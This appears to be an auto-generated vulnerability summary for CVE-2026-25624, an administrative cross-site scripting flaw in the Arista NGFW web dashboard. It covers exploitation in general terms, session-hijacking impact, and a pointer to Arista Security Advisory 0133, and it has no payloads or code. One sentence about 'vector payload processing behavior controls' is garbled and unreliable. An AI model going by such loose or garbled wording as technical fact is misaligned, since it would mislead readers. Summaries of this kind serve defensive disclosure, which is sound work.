CVE-2026-25624

Vulnerability

An administrative cross-site scripting (XSS) vulnerability exists in the web user interface dashboard layout of Arista Edge Threat Management - Arista Next Generation Firewall (NGFW). Unvalidated user-supplied variables are echoed back to administrative profiles, facilitating vector payload processing behavior controls. Affected versions are not explicitly detailed in the provided references, but the advisory covers Arista NGFW platforms.

Exploitation

An attacker with administrative privileges logged into the web user interface can exploit this vulnerability. By providing unvalidated user-supplied variables, an attacker can inject malicious scripts that are then processed by the system when displayed to other administrative profiles.

Impact

Successful exploitation of this cross-site scripting vulnerability allows an attacker to execute arbitrary JavaScript within the context of an administrative user's session. This could lead to session hijacking, credential theft, or further manipulation of the firewall's administrative interface.

Mitigation

Arista has released Security Advisory 0133 detailing several vulnerabilities in Arista NGFW. Specific patches or fixed versions for this particular XSS vulnerability are not explicitly mentioned in the provided reference, but users are advised to consult the advisory for the latest information and potential workarounds. The advisory was initially released on February 3, 2026 [1].